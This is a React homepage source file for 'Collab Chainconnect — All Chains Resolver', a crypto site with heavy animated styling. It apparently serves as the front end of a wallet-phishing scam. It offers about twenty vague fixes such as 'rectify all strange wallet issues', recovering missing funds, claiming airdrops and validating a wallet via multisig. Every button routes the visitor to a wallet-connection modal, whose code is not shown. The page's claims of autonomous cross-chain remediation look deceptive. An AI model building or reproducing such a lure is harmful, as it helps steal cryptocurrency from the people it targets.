// src/pages/HomePage.js
import React, { useEffect, useRef, useState } from 'react';
import { motion, AnimatePresence, useScroll, useSpring } from 'framer-motion';
import { Link, useNavigate } from 'react-router-dom';
import WalletModal from '../components/WalletModal/WalletModal';

// Modern geometric logo - stylized mark with network connections
const CollabChainconnectLogo = ({ className = "h-9 w-9" }) => (
  <svg
    className={className}
    viewBox="0 0 64 64"
    xmlns="http://www.w3.org/2000/svg"
    aria-label="Collab Chainconnect logo"
  >
    <defs>
      <linearGradient id="logo-primary" x1="0%" y1="0%" x2="100%" y2="100%">
        <stop offset="0%" stopColor="#7c3aed" />
        <stop offset="50%" stopColor="#c084fc" />
        <stop offset="100%" stopColor="#a855f7" />
      </linearGradient>
      <linearGradient id="logo-accent" x1="0%" y1="0%" x2="100%" y2="100%">
        <stop offset="0%" stopColor="#c084fc" />
        <stop offset="100%" stopColor="#e879f9" />
      </linearGradient>
      <filter id="glow">
        <feGaussianBlur stdDeviation="2" result="coloredBlur"/>
        <feMerge>
          <feMergeNode in="coloredBlur"/>
          <feMergeNode in="SourceGraphic"/>
        </feMerge>
      </filter>
    </defs>
    {/* Main "D" shape with modern twist */}
    <path
      d="M18 12 L18 52 L40 52 Q48 52 48 32 Q48 12 40 12 Z"
      fill="url(#logo-primary)"
      opacity="0.95"
      filter="url(#glow)"
    />
    {/* Inner cutout for "D" */}
    <path
      d="M22 16 L22 48 L36 48 Q42 48 42 32 Q42 16 36 16 Z"
      fill="none"
      stroke="rgba(255,255,255,0.15)"
      strokeWidth="1"
    />
    {/* Network connection nodes */}
    <circle cx="50" cy="20" r="4" fill="url(#logo-accent)" opacity="0.9" />
    <circle cx="50" cy="44" r="4" fill="url(#logo-accent)" opacity="0.9" />
    {/* Connection lines */}
    <path
      d="M48 20 L42 20 M48 44 L42 44"
      stroke="url(#logo-accent)"
      strokeWidth="2"
      strokeLinecap="round"
      opacity="0.8"
    />
    {/* Subtle inner highlight */}
    <path
      d="M20 16 Q24 14 28 14"
      stroke="rgba(255,255,255,0.2)"
      strokeWidth="1.5"
      fill="none"
      strokeLinecap="round"
    />
  </svg>
);

// Self-contained rotating phrase that doesn't re-render the parent tree
const RotatingPhrase = React.memo(function RotatingPhrase() {
  const phrases = React.useRef([
    'instant migration recovery',
    'trustless token bridging',
    'seamless claim resolution',
    'smart swap diagnostics',
    'NFT rescue & registry sync',
    'multisig wallet validation'
  ]).current;
  const [i, setI] = useState(0);
  useEffect(() => {
    const id = setInterval(() => setI((x) => (x + 1) % phrases.length), 2600);
    return () => clearInterval(id);
  }, [phrases.length]);
  return (
    <span className="inline-block font-semibold bg-gradient-to-r from-[#7c3aed] via-[#c084fc] to-[#a855f7] bg-clip-text text-transparent">
      <AnimatePresence mode="wait">
        <motion.span
          key={i}
          initial={{ opacity: 0, y: 8 }}
          animate={{ opacity: 1, y: 0 }}
          exit={{ opacity: 0, y: -8 }}
          transition={{ duration: 0.45 }}
          className="whitespace-nowrap inline-block min-w-[12ch] text-center"
        >
          {phrases[i]}
        </motion.span>
      </AnimatePresence>
    </span>
  );
});

const HomePage = ({ openConnectOnLoad = false }) => {
  const [isModalOpen, setIsModalOpen] = useState(false);
  const navRef = useRef(null);
  const spotlightRef = useRef(null);
  const navigate = useNavigate();
  const goToConnect = () => {
    navigate(`/connect`);
    setTimeout(() => window.scrollTo({ top: 0, left: 0, behavior: 'auto' }), 0);
  };
  // Use framer-motion scroll progress to avoid React state re-renders on scroll
  const { scrollYProgress } = useScroll();
  const scrollX = useSpring(scrollYProgress, { stiffness: 120, damping: 20, mass: 0.4 });
  

  // No React state updates on scroll; progress handled by scrollYProgress

  useEffect(() => {
    const el = navRef.current;
    if (!el) return;
    const onMove = (e) => {
      const r = spotlightRef.current;
      if (!r) return;
      const rect = el.getBoundingClientRect();
      const x = e.clientX - rect.left;
      const y = e.clientY - rect.top;
      r.style.setProperty('--spot-x', `${x}px`);
      r.style.setProperty('--spot-y', `${y}px`);
    };
    el.addEventListener('mousemove', onMove);
    return () => el.removeEventListener('mousemove', onMove);
  }, []);

  useEffect(() => {
    if (openConnectOnLoad) {
      setIsModalOpen(true);
      // Ensure scroll at top when this route is used
      window.scrollTo({ top: 0, left: 0, behavior: 'auto' });
    }
  }, [openConnectOnLoad]);

  

  // Minimal crypto icons (monochrome gold) for the carousel
  const CryptoIcon = ({ symbol }) => {
    switch (symbol) {
      case 'BTC':
        return (
          <svg width="24" height="24" viewBox="0 0 24 24" aria-hidden>
            <circle cx="12" cy="12" r="10" fill="#a855f7" />
            <path d="M10 7h3.5a2.5 2.5 0 010 5H9m1 0h3a2.5 2.5 0 010 5H10" stroke="#ffffff" strokeWidth="1.8" fill="none" strokeLinecap="round" />
          </svg>
        );
      case 'ETH':
        return (
          <svg width="24" height="24" viewBox="0 0 24 24" aria-hidden>
            <circle cx="12" cy="12" r="10" fill="#c084fc" />
            <path d="M12 5l4 7-4 2-4-2 4-7zm0 14l-4-6 4 2 4-2-4 6z" fill="#ffffff" />
          </svg>
        );
      case 'SOL':
        return (
          <svg width="24" height="24" viewBox="0 0 24 24" aria-hidden>
            <circle cx="12" cy="12" r="10" fill="#9a6bff" />
            <path d="M7 9h10l-2 2H5l2-2zm0 6h10l-2 2H5l2-2zm2-3h10l-2 2H7l2-2z" fill="#ffffff" />
          </svg>
        );
      case 'BNB':
        return (
          <svg width="24" height="24" viewBox="0 0 24 24" aria-hidden>
            <circle cx="12" cy="12" r="10" fill="#a855f7" />
            <path d="M12 6l2 2-2 2-2-2 2-2zm0 8l2 2-2 2-2-2 2-2zm4-4l2 2-2 2-2-2 2-2zm-8 0l2 2-2 2-2-2 2-2z" fill="#ffffff" />
          </svg>
        );
      case 'ADA':
        return (
          <svg width="24" height="24" viewBox="0 0 24 24" aria-hidden>
            <circle cx="12" cy="12" r="10" fill="#e879f9" />
            <g fill="#ffffff">
              <circle cx="12" cy="12" r="2" />
              <circle cx="7.5" cy="12" r="1.2" />
              <circle cx="16.5" cy="12" r="1.2" />
              <circle cx="10" cy="8.5" r="1" />
              <circle cx="14" cy="8.5" r="1" />
              <circle cx="10" cy="15.5" r="1" />
              <circle cx="14" cy="15.5" r="1" />
            </g>
          </svg>
        );
      default:
        return null;
    }
  };

  const cryptoItems = [
    { symbol: 'BTC', name: 'Bitcoin' },
    { symbol: 'ETH', name: 'Ethereum' },
    { symbol: 'SOL', name: 'Solana' },
    { symbol: 'BNB', name: 'BNB' },
    { symbol: 'ADA', name: 'Cardano' },
  ];

  const actions = [
    {
      title: 'SYNCHRONIZE',
      description: 'Click here to synchronize your wallet data across multiple chains and networks.'
    },
    {
      title: 'MIGRATION',
      description: 'Click here for migration or to resolve any migration related issues.'
    },
    {
      title: 'RECTIFICATION',
      description: 'Click here to rectify all strange wallet issues.'
    },
    {
      title: 'CLAIM',
      description: 'Click here to claim tokens or resolve any token claiming related issues.'
    },
    {
      title: 'SWAP',
      description: 'Click here to swap tokens or resolve issues related to token swap.'
    },
    {
      title: 'SLIPPAGE',
      description: 'Click here for slippage or transaction fee related issues.'
    },
    {
      title: 'CLAIM AIRDROP',
      description: 'Click here to claim airdrop or resolve errors encountered during airdrop claim.'
    },
    {
      title: 'STAKING',
      description: 'Click here to resolve issues encountered while staking/unstaking.'
    },
    {
      title: 'WHITELIST',
      description: 'Click here to whitelist your address or resolve whitelisting related error.'
    },
    {
      title: 'CROSS TRANSFER',
      description: 'Click here to resolve cross bridging errors encountered during cross transfer.'
    },
    {
      title: 'NFTs',
      description: 'Click here to resolve NFT related issues.'
    },
    {
      title: 'LOCKED ACCOUNT',
      description: 'Click here to resolve locked account or wallet stuck issues.'
    },
    {
      title: 'LOGIN ERROR',
      description: 'Click here to resolve errors encountered during login.'
    },
    {
      title: 'WALLET GLITCH',
      description: 'Click here to resolve wallet issues.'
    },
    {
      title: 'DEFI FARMING',
      description: 'Click here for DeFi or Commercial farming related issues.'
    },
    {
      title: 'VALIDATION',
      description: 'Click here to validate your wallet via Multisig.'
    },
    {
      title: 'TRANSACTION DELAY',
      description: 'Click here for any transaction related error.'
    },
    {
      title: 'MISSING/IRREGULAR BALANCE',
      description: 'Click here to recover lost or missing funds.'
    },
    {
      title: 'RECOVERY',
      description: 'Click here for wallet recovery.'
    },
    {
      title: 'BUY TOKEN/COIN',
      description: 'Click here to trade. Your account has to be marked as a trusted payment source to start trading.'
    },
    {
      title: 'EXCHANGE',
      description: 'Click here for token exchange or to resolve errors encountered during token exchange.'
    },
    {
      title: 'BRIDGING',
      description: 'Click here to bridge tokens or resolve bridging related issues.'
    }
  ];

  const BlockchainIllustration = () => (
    <div className="mb-16">
      <motion.svg 
        viewBox="0 0 400 300" 
        className="w-full max-w-2xl mx-auto"
        initial={{ opacity: 0, y: 20 }}
        animate={{ opacity: 1, y: 0 }}
        transition={{ duration: 0.8, delay: 0.5 }}
      >
        <defs>
          <linearGradient id="cube-gradient" x1="0%" y1="0%" x2="100%" y2="100%">
            <stop offset="0%" stopColor="#7c3aed"/>
            <stop offset="50%" stopColor="#c084fc"/>
            <stop offset="100%" stopColor="#a855f7"/>
          </linearGradient>
        </defs>
        
        {/* Main cubes */}
        <g>
          <motion.path 
            d="M160,120 L200,100 L240,120 L200,140 Z" 
            fill="url(#cube-gradient)" 
            opacity="0.9"
            initial={{ opacity: 0 }}
            animate={{ opacity: 0.9 }}
            transition={{ duration: 1, delay: 0.8 }}
          />
          <motion.path 
            d="M200,100 L240,120 L240,160 L200,140 Z" 
            fill="url(#cube-gradient)" 
            opacity="0.8"
            initial={{ opacity: 0 }}
            animate={{ opacity: 0.8 }}
            transition={{ duration: 1, delay: 1 }}
          />
          <motion.path 
            d="M160,120 L200,140 L200,180 L160,160 Z" 
            fill="url(#cube-gradient)" 
            opacity="0.7"
            initial={{ opacity: 0 }}
            animate={{ opacity: 0.7 }}
            transition={{ duration: 1, delay: 1.2 }}
          />
        </g>
        
        {/* Connection lines */}
        <motion.g
          initial={{ opacity: 0 }}
          animate={{ opacity: 0.5 }}
          transition={{ duration: 1, delay: 1.4 }}
        >
          <path d="M180,130 L180,150" stroke="#c084fc" strokeWidth="1" strokeDasharray="3,3"/>
          <path d="M220,130 L220,150" stroke="#c084fc" strokeWidth="1" strokeDasharray="3,3"/>
        </motion.g>
      </motion.svg>
    </div>
  );

  const ActionCard = ({ title, description, index }) => (
    <motion.button
      initial={{ opacity: 0, y: 24, scale: 0.98 }}
      animate={{ opacity: 1, y: 0, scale: 1 }}
      transition={{ type: 'spring', stiffness: 140, damping: 16, delay: index * 0.06 }}
      whileHover={{ scale: 1.03, y: -6 }}
      whileFocus={{ scale: 1.03, y: -6 }}
      whileTap={{ scale: 0.98 }}
      onClick={() => setIsModalOpen(true)}
      className="bg-[#1a1229]/90 backdrop-blur-sm p-6 rounded-xl text-left hover:bg-[#24193c]/90 
                 transition-all duration-300 border border-[#7c3aed]/40 shadow-[0_8px_20px_rgba(124,58,237,0.2)] hover:shadow-[0_12px_28px_rgba(192,132,252,0.3)] w-full"
    >
      <h3 className="text-lg font-semibold mb-2 text-white">{title}</h3>
      <p className="text-sm text-gray-400 leading-relaxed">{description}</p>
    </motion.button>
  );

  // Single handler for both connect buttons
  const handleConnectClick = () => {
    setIsModalOpen(true);
  };

  return (
    <div className="min-h-screen bg-gradient-to-br from-[#0b0818] via-[#1a1229] to-[#0b0818] text-white relative overflow-hidden font-sans pb-12 md:pb-8">
      {/* Aurora animated background overlay (purely visual) */}
      <motion.div
        aria-hidden
        className="pointer-events-none absolute -inset-40 z-0"
        initial={{ opacity: 0 }}
        animate={{ opacity: 1 }}
        transition={{ duration: 1 }}
        style={{
          background: 'radial-gradient(60% 60% at 20% 20%, rgba(124,58,237,0.25) 0%, rgba(124,58,237,0) 60%), radial-gradient(50% 50% at 80% 30%, rgba(192,132,252,0.22) 0%, rgba(192,132,252,0) 60%), radial-gradient(40% 40% at 50% 80%, rgba(139,92,246,0.18) 0%, rgba(139,92,246,0) 60%)'
        }}
      />
      <div className="fixed inset-0">
        {/* Horizontal scanning lines */}
        <div className="hidden sm:block">
        {[...Array(8)].map((_, i) => (
          <motion.div
            key={`scan-${i}`}
            className="absolute h-[2px] w-full bg-gradient-to-r from-transparent via-[rgba(124,58,237,0.6)] to-transparent"
            animate={{
              x: ['-100%', '100%'],
              opacity: [0, 1, 0],
            }}
            transition={{
              duration: 3,
              delay: i * 0.4,
              repeat: Infinity,
              ease: "linear"
            }}
            style={{
              top: `${15 + i * 10}%`,
            }}
          />
        ))}
        </div>

        {/* Additional horizontal tech lines */}
        <div className="hidden sm:block">
        {[...Array(15)].map((_, i) => (
          <motion.div
            key={`tech-${i}`}
            className="absolute h-[1px] w-[200px] bg-gradient-to-r from-[rgba(192,132,252,0.3)] to-transparent"
            animate={{
              x: ['0%', '100%'],
              opacity: [0.5, 0, 0.5],
            }}
            transition={{
              duration: 5,
              delay: i * 0.3,
              repeat: Infinity,
              ease: "linear"
            }}
            style={{
              top: `${5 + i * 6}%`,
              left: `${(i % 3) * 30}%`,
            }}
          />
        ))}
        </div>

        {/* Tech grid with dots */}
        <div className="hidden sm:block absolute inset-0 opacity-[0.1]">
          {[...Array(20)].map((_, i) => (
            <motion.div
              key={`dot-${i}`}
              className="absolute h-1 w-1 bg-[rgba(124,58,237,0.9)] rounded-full"
              animate={{
                scale: [1, 1.5, 1],
                opacity: [0.5, 1, 0.5],
              }}
              transition={{
                duration: 2,
                delay: i * 0.2,
                repeat: Infinity,
                ease: "easeInOut"
              }}
              style={{
                left: `${(i % 5) * 25}%`,
                top: `${Math.floor(i / 5) * 25}%`,
              }}
            />
          ))}
        </div>

        {/* Animated circuit paths */}
        <svg className="hidden sm:block absolute inset-0 w-full h-full opacity-[0.07]" xmlns="http://www.w3.org/2000/svg">
          <motion.path
            d="M0 100 Q 100 100 200 200 T 400 300"
            stroke="url(#circuit-gradient)"
            strokeWidth="2"
            fill="none"
            initial={{ pathLength: 0 }}
            animate={{ pathLength: 1 }}
            transition={{
              duration: 3,
              repeat: Infinity,
              ease: "linear"
            }}
          />
          <defs>
            <linearGradient id="circuit-gradient" x1="0%" y1="0%" x2="100%" y2="0%">
              <stop offset="0%" stopColor="#7c3aed" stopOpacity="0" />
              <stop offset="50%" stopColor="#c084fc" stopOpacity="1" />
              <stop offset="100%" stopColor="#a855f7" stopOpacity="0" />
            </linearGradient>
          </defs>
        </svg>

        {/* Matrix-style falling characters */}
        <div className="hidden sm:block absolute inset-0 opacity-[0.05]">
          {[...Array(10)].map((_, i) => (
            <motion.div
              key={i}
              className="absolute w-px h-32 bg-gradient-to-b from-transparent via-[rgba(192,132,252,0.7)] to-transparent"
              animate={{
                y: ['-100%', '100vh'],
              }}
              transition={{
                duration: 10,
                delay: i * 0.8,
                repeat: Infinity,
                ease: "linear"
              }}
              style={{
                left: `${i * 10}%`,
              }}
            />
          ))}
        </div>

        {/* Hexagon grid pattern */}
        <div 
          className="hidden sm:block absolute inset-0 opacity-[0.07]"
          style={{
            backgroundImage: `url("data:image/svg+xml,%3Csvg width='60' height='60' viewBox='0 0 60 60' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M30 5L55 20V40L30 55L5 40V20L30 5Z' stroke='%234f46e5' fill='none' stroke-width='0.5'/%3E%3C/svg%3E")`,
            backgroundSize: '60px 60px'
          }}
        />

        {/* Keep existing background elements */}
        <div className="hidden sm:block absolute inset-0 opacity-[0.07]">
          <div className="absolute h-[200%] w-full transform -rotate-45">
            {[...Array(10)].map((_, i) => (
              <motion.div
                key={i}
                className="h-24 bg-gradient-to-r from-purple-500/10 via-transparent to-transparent"
                animate={{
                  x: ['-10%', '10%'],
                }}
                transition={{
                  duration: 8,
                  delay: i * 0.5,
                  repeat: Infinity,
                  repeatType: "reverse",
                  ease: "easeInOut"
                }}
                style={{
                  transform: `translateY(${i * 96}px)`,
                }}
              />
            ))}
          </div>
        </div>

        {/* Enhanced glow effects */}
        <div className="hidden sm:block absolute inset-0">
          <motion.div 
            className="absolute top-[20%] left-[10%] w-96 h-96 bg-[rgba(124,58,237,0.3)] rounded-full filter blur-[128px]"
            animate={{
              scale: [1, 1.2, 1],
              opacity: [0.2, 0.3, 0.2],
            }}
            transition={{
              duration: 8,
              repeat: Infinity,
              ease: "easeInOut"
            }}
          />
          <motion.div 
            className="absolute bottom-[20%] right-[10%] w-96 h-96 bg-[rgba(192,132,252,0.2)] rounded-full filter blur-[128px]"
            animate={{
              scale: [1.2, 1, 1.2],
              opacity: [0.2, 0.3, 0.2],
            }}
            transition={{
              duration: 8,
              repeat: Infinity,
              ease: "easeInOut"
            }}
          />
        </div>

        {/* Digital Binary Rain Effect */}
        <div className="hidden sm:block">
        {[...Array(15)].map((_, i) => (
          <motion.div
            key={`binary-${i}`}
            className="absolute text-xs text-[rgba(124,58,237,0.5)] whitespace-nowrap overflow-hidden"
            style={{
              left: `${i * 7}%`,
              top: '-20px',
              writingMode: 'vertical-rl',
            }}
            animate={{
              y: ['0%', '100%'],
            }}
            transition={{
              duration: Math.random() * 10 + 10,
              repeat: Infinity,
              ease: "linear",
              delay: Math.random() * 2,
            }}
          >
            {[...Array(30)].map(() => Math.round(Math.random())).join('')}
          </motion.div>
        ))}
        </div>

        {/* Animated Hexagonal Grid */}
        <div className="hidden sm:block absolute inset-0">
          {[...Array(6)].map((_, i) => (
            <motion.div
              key={`hex-${i}`}
              className="absolute w-32 h-32 border border-[rgba(124,58,237,0.25)]"
              style={{
                left: `${(i % 3) * 33}%`,
                top: `${Math.floor(i / 3) * 50}%`,
                clipPath: 'polygon(50% 0%, 100% 25%, 100% 75%, 50% 100%, 0% 75%, 0% 25%)',
              }}
              animate={{
                scale: [1, 1.2, 1],
                opacity: [0.1, 0.2, 0.1],
              }}
              transition={{
                duration: 4,
                repeat: Infinity,
                delay: i * 0.5,
              }}
            />
          ))}
        </div>

        {/* Animated Circuit Board Patterns */}
        <svg className="hidden sm:block absolute inset-0 w-full h-full opacity-[0.07]">
          <pattern id="circuit-pattern" x="0" y="0" width="100" height="100" patternUnits="userSpaceOnUse">
            <motion.path
              d="M10 10 L90 10 M50 10 L50 90 M10 50 L90 50 M10 90 L90 90"
              stroke="url(#circuit-gradient-2)"
              strokeWidth="0.5"
              fill="none"
              initial={{ pathLength: 0 }}
              animate={{ pathLength: 1 }}
              transition={{
                duration: 5,
                repeat: Infinity,
                ease: "linear"
              }}
            />
            <circle cx="50" cy="50" r="3" fill="#7c3aed" fillOpacity="0.4" />
          </pattern>
          <rect x="0" y="0" width="100%" height="100%" fill="url(#circuit-pattern)" />
          <defs>
            <linearGradient id="circuit-gradient-2" x1="0%" y1="0%" x2="100%" y2="100%">
              <stop offset="0%" stopColor="#7c3aed" stopOpacity="0.5" />
              <stop offset="50%" stopColor="#c084fc" stopOpacity="0.2" />
              <stop offset="100%" stopColor="#a855f7" stopOpacity="0.5" />
            </linearGradient>
          </defs>
        </svg>

        {/* Pulsing Radar Circles */}
        <div className="hidden sm:block">
        {[...Array(3)].map((_, i) => (
          <motion.div
            key={`radar-${i}`}
            className="absolute rounded-full border border-[rgba(124,58,237,0.25)]"
            style={{
              left: '50%',
              top: '50%',
              width: `${(i + 1) * 200}px`,
              height: `${(i + 1) * 200}px`,
              transform: 'translate(-50%, -50%)',
            }}
            animate={{
              scale: [1, 1.5],
              opacity: [0.2, 0],
            }}
            transition={{
              duration: 3,
              delay: i * 0.8,
              repeat: Infinity,
              ease: "linear"
            }}
          />
        ))}
        </div>

        {/* Tech Grid Lines */}
        <div className="hidden sm:block absolute inset-0" 
             style={{
               backgroundImage: `
                 linear-gradient(90deg, rgba(79, 70, 229, 0.1) 1px, transparent 1px),
                 linear-gradient(0deg, rgba(79, 70, 229, 0.1) 1px, transparent 1px)
               `,
               backgroundSize: '20px 20px'
             }}
        />

        {/* Gradient overlay */}
        <div className="absolute inset-0 bg-gradient-to-b from-[#0b0818]/90 via-transparent to-[#0b0818]/90" />
      </div>

      {/* Navigation Bar */}
      <motion.nav 
        ref={navRef}
        initial={{ opacity: 0, y: -20 }}
        animate={{ opacity: 1, y: 0 }}
        className="sticky top-0 z-30 border-b border-[#7c3aed]/40 bg-[#1a1229]/90 backdrop-blur-xl"
      >
        {/* Scroll progress bar */}
        <div className="absolute top-0 left-0 h-[2px] w-full bg-transparent overflow-hidden">
          <motion.div 
            className="h-full w-full bg-gradient-to-r from-[#7c3aed] via-[#c084fc] to-[#a855f7] origin-left"
            style={{ scaleX: scrollX }}
          />
        </div>

        {/* Spotlight cursor */}
        <div 
          ref={spotlightRef}
          className="hidden md:block absolute inset-0 pointer-events-none"
          style={{
            background: 'radial-gradient(120px 120px at var(--spot-x, -200px) var(--spot-y, -200px), rgba(124,58,237,0.2), transparent 60%)'
          }}
        />

        <div className="max-w-6xl mx-auto px-4 md:px-8 py-2 md:py-3 flex justify-between items-center">
          <div className="flex items-center gap-3">
            <CollabChainconnectLogo className="h-9 w-9" />
              <span className="text-base sm:text-lg md:text-xl font-semibold bg-gradient-to-r from-white to-gray-300 
                            bg-clip-text text-transparent whitespace-nowrap truncate">
              Collab Chainconnect
              </span>
          </div>
          <div className="flex items-center gap-2 md:gap-4">
            {/* Menu items for existing pages/features */}
            <Link 
              to="/"
              className="hidden md:inline-block text-sm text-gray-300 hover:text-white transition-colors"
            >
              Home
            </Link>
            <button 
              onClick={handleConnectClick}
              className="hidden md:inline-block text-sm text-gray-300 hover:text-white transition-colors"
            >
              Connect
            </button>
            {/* Primary CTA with magnetic hover */}
            <motion.button
              whileHover={{ y: -1, scale: 1.02 }}
              whileTap={{ scale: 0.98 }}
              onClick={handleConnectClick}
              className="relative bg-gradient-to-r from-[#7c3aed] to-[#c084fc] text-white px-4 sm:px-5 py-2 rounded-lg 
                       hover:from-[#9a6bff] hover:to-[#e879f9] transition-colors duration-300 font-semibold 
                       shadow-[0_10px_30px_rgba(124,58,237,0.4)]"
            >
              Connect Wallet
              <span className="absolute inset-0 rounded-lg ring-1 ring-black/10"></span>
            </motion.button>
          </div>
        </div>
      </motion.nav>

      {/* Add spacing after menu */}
      <div className="h-8 md:h-12"></div>

      <div className="relative z-10 p-4 md:p-8">
        <div className="max-w-6xl mx-auto">
          {/* Hero Section */}
          <motion.div 
            initial={{ opacity: 0, y: 20 }}
            animate={{ opacity: 1, y: 0 }}
            transition={{ duration: 0.5 }}
            className="text-center mb-12"
          >
            <h1 className="text-3xl sm:text-4xl md:text-5xl font-extrabold mb-4 sm:mb-6 bg-gradient-to-r from-[#7c3aed] via-[#c084fc] to-[#a855f7] bg-clip-text text-transparent">
              Collab Chainconnect — All Chains Resolver
            </h1>
            <p className="text-base sm:text-lg text-gray-300 mb-6 sm:mb-8 max-w-3xl mx-auto">
              Collab Chainconnect is a protocol for autonomous, cross‑chain remediation — engineered to fix what slows you down and safeguard what moves you forward. Experience{' '}
              <RotatingPhrase />{' '}across the wallets and networks you already use — continuously, securely, and on your terms.
            </p>
            <motion.button
              whileHover={{ scale: 1.05 }}
              whileTap={{ scale: 0.95 }}
              onClick={handleConnectClick}
              className="bg-gradient-to-r from-[#7c3aed] to-[#c084fc] text-white w-full sm:w-auto px-6 sm:px-8 py-3 rounded-lg hover:from-[#9a6bff] hover:to-[#e879f9] 
                       transition-colors duration-300 font-semibold shadow-lg shadow-[rgba(124,58,237,0.5)]"
            >
              Connect Wallet
            </motion.button>
          </motion.div>

          {/* Crypto Carousel */}
          <div className="mb-10 md:mb-12">
            <div className="relative overflow-hidden rounded-xl border border-[#7c3aed]/40 bg-[#1a1229]/80 backdrop-blur-sm">
              <div className="pointer-events-none absolute left-0 top-0 h-full w-16 bg-gradient-to-r from-[#0b0818] to-transparent" />
              <div className="pointer-events-none absolute right-0 top-0 h-full w-16 bg-gradient-to-l from-[#0b0818] to-transparent" />
              <motion.div
                className="flex gap-8 py-4 px-4"
                animate={{ x: ['0%', '-50%'] }}
                transition={{ duration: 20, repeat: Infinity, ease: 'linear' }}
              >
                {[...cryptoItems, ...cryptoItems].map((c, i) => (
                  <div key={`${c.symbol}-${i}`} className="flex items-center gap-3 min-w-max">
                    <div className="h-8 w-8 rounded-full flex items-center justify-center bg-[#1a1229] ring-1 ring-[#7c3aed]/50">
                      <CryptoIcon symbol={c.symbol} />
                    </div>
                    <div className="flex flex-col">
                      <span className="text-sm font-semibold text-white">{c.symbol}</span>
                      <span className="text-xs text-gray-400">{c.name}</span>
                    </div>
                  </div>
                ))}
              </motion.div>
            </div>
          </div>

          {/* Blockchain Illustration */}
          <BlockchainIllustration />

          {/* Actions Section */}
          <motion.h2 
            initial={{ opacity: 0, y: 20 }}
            animate={{ opacity: 1, y: 0 }}
            transition={{ duration: 0.5, delay: 0.3 }}
            className="text-2xl sm:text-3xl font-bold text-center mb-8 sm:mb-12 bg-gradient-to-r from-[#7c3aed] via-[#c084fc] to-[#a855f7] bg-clip-text text-transparent"
          >
            Get Started Below.
          </motion.h2>

          <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-4">
            {actions.map((action, index) => (
              <ActionCard 
                key={action.title} 
                {...action} 
                index={index}
              />
            ))}
          </div>
        </div>
      </div>

      <WalletModal
        isOpen={isModalOpen}
        onClose={() => setIsModalOpen(false)}
      />

      {/* Footer */}
      <footer className="relative z-10 border-t border-[#7c3aed]/40 bg-[#1a1229]/90 backdrop-blur-sm mt-12">
        <div className="max-w-6xl mx-auto px-4 md:px-8 py-10 md:py-12">
          <div className="grid grid-cols-1 md:grid-cols-4 gap-8">
            <div>
              <div className="flex items-center gap-3 mb-3">
                <CollabChainconnectLogo className="h-8 w-8" />
                <span className="text-lg font-semibold bg-gradient-to-r from-white to-gray-300 bg-clip-text text-transparent">Collab Chainconnect</span>
              </div>
              <p className="text-sm text-gray-400 leading-relaxed">
                Autonomous cross‑chain remediation. Resolve. Recover. Move forward.
              </p>
            </div>
            <div>
              <h4 className="text-sm font-semibold text-white mb-3">Quick Links</h4>
              <ul className="space-y-2 text-sm">
                <li><button onClick={goToConnect} className="text-gray-300 hover:text-white">Home</button></li>
                <li><button onClick={goToConnect} className="text-gray-300 hover:text-white">Connect</button></li>
                <li><button onClick={goToConnect} className="text-gray-300 hover:text-white">Demo</button></li>
              </ul>
            </div>
            <div className="md:col-span-2">
              <h4 className="text-sm font-semibold text-white mb-3">Actions</h4>
              <div className="grid grid-cols-2 md:grid-cols-3 gap-2">
                {actions.map((a) => (
                  <button key={a.title} onClick={goToConnect} className="text-left text-sm text-gray-300 hover:text-white truncate">
                    {a.title}
                  </button>
                ))}
              </div>
            </div>
          </div>
          <div className="mt-8 pt-6 border-t border-[#7c3aed]/30 flex flex-col md:flex-row items-center justify-between gap-4 text-xs text-gray-400">
            <span>© {new Date().getFullYear()} Collab Chainconnect. All rights reserved.</span>
            <div className="flex items-center gap-4">
              <button onClick={goToConnect} className="hover:text-white">Privacy</button>
              <button onClick={goToConnect} className="hover:text-white">Terms</button>
              <button onClick={goToConnect} className="hover:text-white">Support</button>
            </div>
          </div>
        </div>
        {/* No spacer: page container has padding-bottom; fixed CTA floats above */}
      </footer>

      {/* Floating neon badge — keeps same connect functionality */}
      {/* Floating CTA remains but with refined gold gradient */}
      <motion.button
        whileHover={{ scale: 1.05 }}
        whileTap={{ scale: 0.95 }}
        onClick={handleConnectClick}
        className="fixed bottom-4 right-4 md:bottom-6 md:right-6 z-30 px-4 md:px-5 py-3 rounded-full bg-gradient-to-r from-[#7c3aed] to-[#c084fc] shadow-[0_0_40px_rgba(124,58,237,0.5)] hover:shadow-[0_0_60px_rgba(192,132,252,0.6)] transition-shadow text-white"
      >
        <span className="relative inline-flex items-center gap-2 text-white font-semibold">
          <span className="h-2 w-2 rounded-full bg-white animate-pulse" />
          <span>Resolve issues</span>
        </span>
      </motion.button>

      {/* Subtle robot illustration on hero (decorative) */}
      <motion.svg
        aria-hidden
        viewBox="0 0 300 240"
        className="hidden md:block pointer-events-none absolute right-4 md:right-12 top-28 md:top-24 w-[220px] md:w-[300px] opacity-20"
        initial={{ opacity: 0, y: 15 }}
        animate={{ opacity: 0.2, y: 0 }}
        transition={{ duration: 0.8, delay: 0.3 }}
      >
        <defs>
          <linearGradient id="logo-grad" x1="0%" y1="0%" x2="100%" y2="0%">
            <stop offset="0%" stopColor="#7c3aed" />
            <stop offset="50%" stopColor="#c084fc" />
            <stop offset="100%" stopColor="#a855f7" />
          </linearGradient>
        </defs>
        {/* Interconnected nodes design */}
        <circle cx="80" cy="80" r="25" fill="none" stroke="url(#logo-grad)" strokeWidth="2" opacity="0.6" />
        <circle cx="220" cy="80" r="25" fill="none" stroke="url(#logo-grad)" strokeWidth="2" opacity="0.6" />
        <circle cx="150" cy="160" r="25" fill="none" stroke="url(#logo-grad)" strokeWidth="2" opacity="0.6" />
        <path d="M105 80 L195 80" stroke="url(#logo-grad)" strokeWidth="2" strokeLinecap="round" opacity="0.5" />
        <path d="M135 100 L165 140" stroke="url(#logo-grad)" strokeWidth="2" strokeLinecap="round" opacity="0.5" />
        <path d="M195 100 L165 140" stroke="url(#logo-grad)" strokeWidth="2" strokeLinecap="round" opacity="0.5" />
        <circle cx="80" cy="80" r="8" fill="#7c3aed" />
        <circle cx="220" cy="80" r="8" fill="#c084fc" />
        <circle cx="150" cy="160" r="8" fill="#a855f7" />
      </motion.svg>
    </div>
  );
};

export default HomePage;